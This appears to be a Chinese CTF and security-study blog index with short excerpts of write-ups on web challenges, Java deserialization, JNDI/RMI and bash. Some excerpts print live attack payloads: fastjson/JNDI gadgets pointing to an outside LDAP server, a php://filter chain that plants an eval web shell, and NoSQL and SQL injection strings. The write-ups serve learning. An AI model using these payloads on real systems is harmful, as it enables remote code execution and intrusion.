- 博客(46)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 从nodectf学chromium和js特性
PlaidCTF-Yet Another Calculator App这周末打了一场NodeCTF(plaidctf),去体验了一下外国友人的快乐比赛,其中就对里面最简单的一道题目进行分析,当然我是爆0党,无语(队友们tql0x01 题目因为题目本身是给了docker的,所以我们应该从题目本身去出发查看这道题目。首先看index.tsapp.post("/upload", async (req, res) => { if (typeof req.body !== "ob
2022-04-18 09:39:36
629
1
原创 从rw中学习tomcat
从RWCTF中学习tomcat的操作0x01 调试tomcat首先创建一个maven的java项目,然后下载tomcat的源码,然后copy以下文件参考链接:https://zhuanlan.zhihu.com/p/35454131y4tacker的github差多就这些,就可以启动一个tomcat的调试了。0x02 解决题目参考链接:https://mp.weixin.qq.com/s/QQ2xR32Fxj_nnMsFCucbCg其中最重要的部分就像wp中写得一样,就是在于几个特殊字符
2022-01-28 00:31:58
1030
原创 buu-day10
0x01 [红明谷CTF 2021]JavaWeb/;/json绕过权限校验,然后漏洞探测["java.net.InetAddress","khl16k.dnslog.cn"]["br.com.anteros.dbcp.AnterosDBCPConfig", {"healthCheckRegistry": "ldap://8.142.93.103:9090/test"}]["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation"
2022-01-27 15:11:07
2285
原创 buu-day09
Day9-懒狗来打卡了0x01 [WMCTF2020]Web Check in 2.0绕过死亡exit,这是基本操作了,但是需要找到新的过滤器。懒狗想到这里就去看wp了。=php://filter/zlib.deflate|string.tolower|zlib.inflate|?><?php%0deval($_GET[1]);?>/resource=6.php还有一种方法是segment,就是那个qwb2021才考过的知识点。需要爆破,就不多说了0x02 [CISCN2019
2022-01-26 23:21:45
591
原创 Day8-RMI-JNDI
LDAP协议 JNDI注入中的Reference中的url有什么用? https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf 绕过高版本限制:https://paper.seebug.org/942/RMIRemote Method Invocation 远程方法调用,构建分布式应用程序,可以实现java跨JVM远程通信RMI客户端..
2022-01-06 16:09:47
443
原创 Day7-java反序列化
java终于又开始了,我爱java吹爆p牛的java安全漫谈-入门超友好参考了: https://zhishihezi.net/b/5d644b6f81cbc9e40460fe7eea3c7925序列化和反序列化RMI(Java远程方法调用-Java Remote Method Invocation)和JMX(Java管理扩展-Java Management Extensions)具有广泛而深刻的利用。0x01 序列化和反序列化实现的方法很简单,只要实现了java.io.Serializa.
2022-01-06 08:45:47
486
原创 buu-day08
又是早起刷题的一天0x01 [FBCTF2019]Products Managersql约束注入在插入数据的时候,如果字段设置了应该插入的字符串长度,那么在添加的时候,如果有超过该长度的,就会被截断mysql字符串比较mysql == `mysql空格空格空格空格空格空格空格空格空格空格可以看到sql的每个字段都进行了长度限制,并且在最后的位置并没有进行代码上的处理而是直接插入。所以,我们就可以开始操作了。插入name: facebook .
2022-01-05 11:05:31
663
原创 buu-day07
新的一天从早起刷题开始文章目录0x01 [NPUCTF2020]web????0x02[HCTF 2018]Hideandsee0x03 [MRCTF2020]Ezpop_Reveng0x04 [GKCTF 2021]babycat0x01 XMLDecoder/XMLEncoder概述0x02 xml简介0x03 xml反序列化源码分析0x01 [NPUCTF2020]web????include('config.php'); # $key,$flagdefine("METHOD", "ae
2022-01-05 00:18:23
508
原创 buu-day06
前言: 今天是废物的一天,元旦三天还是要玩一下,不要卷了。0x01 [BSidesCF 2019]Mixer密码web 好题,希望后面可以来复现一波import requestsfrom requests.packages.urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)url = "https://mixer-f
2022-01-03 22:02:46
770
原创 buu-day05
0x01 [NPUCTF2020]验证????str.replace(/(?:Math(?:\.\w+)?)|[()+\-*/&|^%<>=,?:]|(?:\d+\.?\d*(?:e\d+)?)| /g, '')第一步是一个弱类型比较,下面有两个常用的比较方式a[]=a&b[]=aa='1' &b=[1]注意第二种方式必须使用json格式进行传输,不然[1]会被解析成为字符串。很显然这里使用第二种。第二步就是研究上面这个正则表达式了。一共分为3个
2022-01-03 08:08:08
775
原创 buu-day04
0x01[HarekazeCTF2019]Easy Notes这个题目给了源码,用户又没有后端校验,所以我们很容易想到考session的反序列化,因为(sctf考烂了)。具体分析流程可以看网上的·wp,总结就是,需要伪造以下两点:文件名序列化的数据0x02 [SWPU2019]Web3访问任意路由发现的token:keyqqqwwweee!@#$%^&*,发现是伪造session。下面就是随便操作了。.eJyrVspMUbKqVlJIUrJS8g1xLFeq1VHKLI7PyU_Pz
2022-01-02 08:24:12
532
原创 Day13-寻觅踪迹
寻觅踪迹0x01 tcpdumptcpdump -vv -i ens33跟踪指定的网卡tcpdump -vv -i ens33 port http指定支持显示的协议有http。`-r 从文件中读取流量包,-c表示最大能抓到的packet的数量。hose结合port利用对发往或来自特定主机的i像那些链接。0x02 ngrep是tcpdump和grep的结合体。ngrep -q -c 64 linux port 80-q只答应载荷的头部-c显示多少列-xx用16进制在流量包中搜索。??
2022-01-01 11:12:09
695
转载 Day6-Java 动态代理
JAVA动态代理这个主要实现的其实也就是可以不修改原来的代码来实现方法的增强,具体实现看以下代码。0x01 API主要方法package java.lang.reflect;import java.lang.reflect.InvocationHandler;/** * Creator: yz * Date: 2020/1/15 */public class Proxy implements java.io.Serializable { // 省去成员变量和部分类方法...
2022-01-01 08:39:38
126
原创 Day12-管理重任
0x01 ps常用指令模式ps -e 显示所有进程ps -eo pattern,patter -o指定过滤器显示特定的进程内容????️ 这里如何来确认命令的运行环境是否正确,可以使用命令e``ps -eo pid,cmd e | tail -n 1这个指令就可以看见运行的最后一条指令时运行环境的环境变量,这方便我们在增加定时任务的时候,将相应的环境变量添加到i其中。????️创建进程树状图,跟踪子进程和父进程ps -u clif f | grep -A2 Xterm | head -3这
2022-01-01 00:16:58
541
原创 Day11-明察秋毫
Day11intruder_detect.sh#!/bin/bash# name# toAUTHLOG=/var/log/auth.logif [[ -n $1 ]];then AUTHLOG=$1; echo Using Log file: $AUTHLOG;fi#LOG=/tmp/failed.$$.loggrep -v "Failed pass" $AUTHLOG > $LOGusers=$(cat $LOG | awk '{ print $(NF-5) }
2022-01-01 00:15:51
489
原创 Day10-网络
Day100x01 网络ping列出网络中存活主机#!/bin/bash# name: a.sh# to scan ipfor ip in 192.168.0.{1,255};do (ping $ip -c 2 & > /dev/null; if [ $? -eq 0 ]; then echo $ip is alive; fi )&donewaitssh-C压缩数据FTPftp中可以使用的指令:cd dir : 更改远
2021-12-31 09:18:41
148
原创 Day9-认识与学习BASH(5)
Day90x01 归档1. tar归档常用指令:-c 新建归档文件-x解开归档文件-r向已有的归档文件添加新的文件-v/-vv显示归档文件的详细信息-f指定归档文件的文件名-t列出归档文件中的文件名-z使用gzip2压缩或者解压文件-A拼接两个归档文件????️ 通过ssh传输数据tar cvf - files/ | ssh user@example.com "tar xv -C documents/????️根据时间戳来确定是否加入归档tar -uvvf a.tar fil
2021-12-31 09:16:30
164
转载 Day3-IO
Day3-IO学习0x01 Java FileSystem分类:????️java.io : UnixFileSystem和WinNTFileSystem但是他们因为继承了FileSystem所以可以跨平台????️ java.nio : 底层的native但确实 java的fileSystem只是对于文件操作的一个封装。0x02 Java NIO.2jdk7+实现一套全新的fileSystem.基于非阻塞实现的。????NIO的文件操作在不同的系统的最终实现类也是不一样的,比如Mac的
2021-12-29 23:12:41
214
转载 Day1-javasec-ClassLoader
fastjson的bcel流跟踪 Xalan ClassLoader流跟踪 jsp类加载 链接: https://zhishihezi.net/endpoint/richtext/76290e1cf5ea224079c2e19ef2984523?event=436b34f44b9f95fd3aa8667f1ad451b173526ab5441d9f64bd62d183bed109b0ea1aaaa23c5207a446fa6de9f588db3958e8cd5c825d7d5216199d6433..
2021-12-29 00:07:43
632
2
原创 Day8-认识与学习BASH(4)
Day8-认识与学习BASH0x04 让文件飞cut切分文件cut -f filed_name filenamecut -f 3 --complement studentdata.txt-f : 指定列数--complement 将没有选中的列显示出来cat studentdata.txt | tr "\t" ";" | cut -f 3 -d ";"cat studentdata.txt | tr -d "\t" | cut -c1-2,3-4 --output-delimi
2021-12-28 20:07:08
375
原创 Day7-认识与学习BASH(3)
Day6-认识与学习BASH0X01 BASH基础1. shell内建属性获取字符串的长度length=${#var} 可以获得var的长度获取当前使用的shell$BASH $0检查当前运行用户if [ $UID -ne 0 ] then echo NOT ROOT USER. Please run as rootelse echo Root Userfi或者if test $UID -ne 0 then echo NOT ROOT USER. Please
2021-12-28 09:37:23
643
原创 Day6-认识与学习BASH(2)
数据流重定向0x01 标准输入 标准输出 标准错误输出1> 将标准输出到xx 覆盖1>> 附加到xx2> 将错误信息输出到xx 2>> 将错误信息附加到xx/dev/null 垃圾桶黑洞 可以吃掉所有信息将错误信息和正确信息同时输出到一个文件 2>&1或者&>< 标准输入 << 表示结束的输入字符cat > catfile << "eof"读取屏幕输出或输入的内容,并且当读到eof的时候
2021-12-28 09:35:24
170
原创 Day5-认识与学习BASH(1)
Day5-认识与学习BASH(1)0x01 变量键盘的读取 数组与声明:read、array、declareread-p 后面接提示字符-t 后面接时间限制最后要带上写入变量的名字declare-i 声明整数-a 声明数组-x 变成环境变量ulimit程序的限制和删除-a 显示已经有的限制-f 设置shell处理的文件大小0x02 变量内容的删除、取代与替换echo ${var#/**}#表示从左往右删除最短## 表示最长%表示从右往左替换/old/new 替
2021-12-28 09:33:30
156
原创 MTCTF2021-GrandTravel
GrandTravel0x01 知识点nosql注入+ssrf+node反序列化+node拆分攻击+ftp提权0x02 解题1 sql注入拿到密码首先拿到源码不难看出登录位置有注入嫌疑(感谢葫芦卜师傅的payload)参考https://blog.szfszf.top/article/9/ burp0_data = {"username": f"admin\"&&this[\"pass\"+\"word\"][{pos}]>\"{chr(mid)}\"&&am
2021-12-24 22:13:49
955
原创 [java基础]0x7_java基础类
java的基础类0x01 用户互动public static void main(String[] args)args 是在cmd中对于java代码的传参数scanner 读取文件public class ScannerFile { public static void main(String[] args) throws Exception{ var sc = new Scanner(new File("C:\\Users\\Dem0\\Documents\\WeCha
2021-12-19 09:22:53
187
原创 [java基础]0x6_多版本jar
多版本jar文件0x01 前言jar文件的打包格式原文件格式a/ Test.java Test.classb/ Test.java Test.class打包之后test.jar META-INF //清单文件 MANIFEST.MF a/ Test.java Test.class b/ Test.java Test.class0x02 jar命令1.创建jar文件 jar cf test.jar -C /dist2.显示压缩过程 jar cvf3.
2021-12-19 09:22:23
395
原创 [JAVA基础]0x0_IDEA常用操作
0x01 赋值运算符的扩展0x02 逻辑运算符0x03 module最顶级别是project,最次的是module如果要删除module[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eFlQtYm4-1639876875499)(https://i.loli.net/2021/05/28/qm7wXlJvrE4o5eM.png)]0x04 IDEA常规设置1设置主题2 设置代码提示3 自动导包和删除多余包4 自动导入合并5 显示行号和显
2021-12-19 09:21:57
389
原创 [CTF复现]湖湘杯2021
go_web今天又是学爆guoke哥哥博客的一天0x01 MultistageAgency通过看源码 我们发现 这个题是三个服务su - web -c "/code/bin/web 2>&1 >/code/logs/web.log &"su - web -c "/code/bin/proxy 2>&1 >/code/logs/proxy.log &"/code/bin/server 2>&1 >/code/log
2021-12-14 00:51:51
3896
3
原创 [CTF复现]hition2021复现
orange师傅yyds!0x01 Wa3rmup PHPyaml_parse 这个函数在官方文档中有提到It seams the YAML standard version here is the 1.1 and not the (1.2 released in 2009), so all of the following values: y, Y, yes, Yes, YES, n, N, no, No, NO, true, True, TRUE, false, False, FALSE, on,
2021-12-13 21:32:19
1412
原创 [BUU刷题记录]day01-起步
BUU-WEB这是一个菜鸡的蜕变先小记录一下题目环境部署必备的docker安装sudo apt-get remove docker docker-engine docker.io containerd runc sudo apt-get update sudo apt-get install apt-transport-https ca-certificates curl gnupg lsb-releasecurl -fsSL https://download.docker.com/linux
2021-12-13 14:46:16
5161
原创 [CTF复现]N1CTF2021-queryallthings
N1CTF2021-queryallthethings0x01 osquery 突破开局一张图,答案全靠猜看到sql注入冲压!.一顿fuzz发现是pgsql!!! 虫虫 堆叠注入查一下用户 查一下权限, yi? 怎么什么都没有???这里可以通过一个特性来确定https://www.sqlite.org/schematab.htmlhttp://47.57.246.66:12321/?str=world'; select * from sqlite_temp_master;--+可以理解
2021-11-24 00:31:45
864
2
原创 [php审计]Dedecms审计
前言: 很明显这是一篇翻译文章’原文:https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html0x01 输入是怎么被处理的function _RunMagicQuotes(&$svar){ if (!@get_magic_quotes_gpc()) { if (is_array($svar)) { foreach ($sva
2021-10-02 23:45:25
460
1
转载 [node审计]nodevm2
nodevm的运行流程vm2其实是在vm的基础上进行二次开发所形成的一个沙箱运行环境,所以在内部本身的实现还是调用的是vm的机制。要了解这部分知识必须先了解proxy:https://es6.ruanyifeng.com/?search=weakmap&x=0&y=0#docs/proxy0x01 vm api对应的别人的代码就是const vm = require('vm');const context = { animal: 'cat', count: 2};//
2021-09-23 23:41:50
1665
原创 CISCN2021_0解题目(filter)
CISCN2021_0解题目(filter)0x01 题目初现题目复现简单,压缩包解压这里可以关闭debugweb\index.php首先点开zip文件,这个不用多说然后还有hint再联想一下还和log文件有关,那个必定是larval rce那个漏洞相关了。那就不多说了,有兴趣的可以去看看VNCTF2021 中的lar题目:https://blog.youkuaiyun.com/anwen12/article/details/115127075(这个挺详细原cve分析:https://xz.a
2021-05-21 16:51:30
805
11
原创 Nepnep 2021
Nepnep 2021小评价:题目原题比较多,payload好多通杀。不算上非预期的话,题目质量挺好的。0x01 Easy_Tomcat注册源码读取,头像老梗了。tomcat的常用目录static/img/../../WEB-INF/web.xml<?xml version="1.0" encoding="UTF-8"?><web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http:
2021-03-27 10:18:03
455
原创 VNCTF(web)小白详解
VNCTF(web)小白详解看了下师傅们的wp,发现还挺难理解的。下面跟着大家做个简单的解答。0x01 realezjvav一上来就是常规的登录框,估摸着就是sql注入,paylod一拿到,一打,欸,不错,笛卡尔乘积盲注(原理:多个数据表链接的时候,数据大了,所以时间长)拿到密码no_0ne_kn0w_th1s然后是这个,看不出来,我们继续。发现这个就是我们fastjson,rce了。https://github.com/welk1n/JNDI-Injection-Exploit/blob/
2021-03-23 16:06:42
1317
2
原创 HGAME2021 - 梦的开始
HGAME2021 - 梦的开始WEB0x01 200OK!参考链接:https://blog.youkuaiyun.com/anwen12/article/details/1137280650x02 LazyDogR4U一个简单的代码审计类的问题这是提示这里请不要像沙雕的博主一样,将简单的替换为空,理解为需要找寻其他的系统变量,因为所有的变量都已经被制空了。至于需要一个已经登陆的账号,0e的MD5绕过大可不必再说。0x03 LIKI的生日礼物题目的初步探索,没有注入,没有购买逻辑漏洞,有的只有竞
2021-03-01 20:16:05
2329
原创 FBCTF2019-RCEService
0x01 题目初现<?phpputenv('PATH=/home/rceservice/jail');if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>'; } elseif (preg_match('/^.*(alias|bg|bind|break|bui
2021-02-26 17:38:47
280
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人